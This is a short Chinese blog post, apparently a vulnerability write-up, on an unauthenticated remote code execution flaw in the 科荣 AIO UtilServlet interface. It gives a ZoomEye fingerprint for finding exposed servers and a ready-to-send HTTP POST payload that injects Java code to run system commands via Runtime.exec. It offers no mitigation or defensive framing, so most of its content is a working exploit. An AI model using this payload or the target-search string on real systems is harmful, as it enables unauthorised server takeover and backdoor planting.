Babing
Published on 2024-08-30 / 3 Visits
0
0

K1-1科荣-AIO-RCE

K1-1科荣-AIO-RCE

漏洞描述:

科荣AIO UtilServlet 接口处存远程代码执行漏洞,未经身份验证的攻击者可通过该漏洞远程执行恶意代码,写入后门文件,可获取服务器权限。

影响版本:

  • 科荣-AIO

网站图片:

image-20240625203342774

网络测绘:

fofa语法:

钟馗之眼:“changeAccount('8000')”

漏洞复现:

payload:

POST /UtilServlet HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field

效果图:


Comment